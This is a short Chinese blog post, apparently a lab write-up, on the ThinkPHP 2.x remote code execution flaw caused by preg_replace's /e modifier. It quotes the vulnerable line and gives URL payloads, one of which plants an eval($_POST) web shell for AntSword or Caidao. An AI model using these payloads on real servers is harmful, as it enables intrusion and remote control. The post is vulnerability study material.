thinkphp 2-rce

thinkphp

发布日期: 2021-09-30

更新日期: 2021-10-20

文章字数: 329

阅读时长: 1 分

阅读次数:

1	$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));

导致输入的参数被插入双引号中执行，造成任意代码执行漏洞

preg_replace('正则表达','替换字符','目标字符')

就是如果目标字符中存在符合正则规则的字符，那么就替换为替换字符，而如果此时正则规则中使用了/e这个修饰符，则存在代码执行漏洞

1 2	e 配合函数preg_replace()使用, 可以把匹配来的字符串当作正则表达式执行; /e 可执行模式，此为PHP专有参数，例如preg_replace函数。

thinkPHP 2.x

thinkphp lite模式下3.0

访问8080端口

payload

ip:8080/index.php?s=/index/index/xxx/${@phpinfo()}

ip:8080/index.php?s=a/b/c/${@print(eval($_POST[1]))} //一句话连接蚁剑菜刀

回显系统发生错误，但其实已经执行成功

测试一下连接

l0odrd

https://King10280.github.io/2021/09/30/thinkphp-2-rce/

本博客所有文章除特別声明外，均采用 CC BY 4.0 许可协议。转载请注明来源 l0odrd !

thinkphp

2021-10-20 l0odrd

thinkphp

2021-09-20 l0odrd

fastjson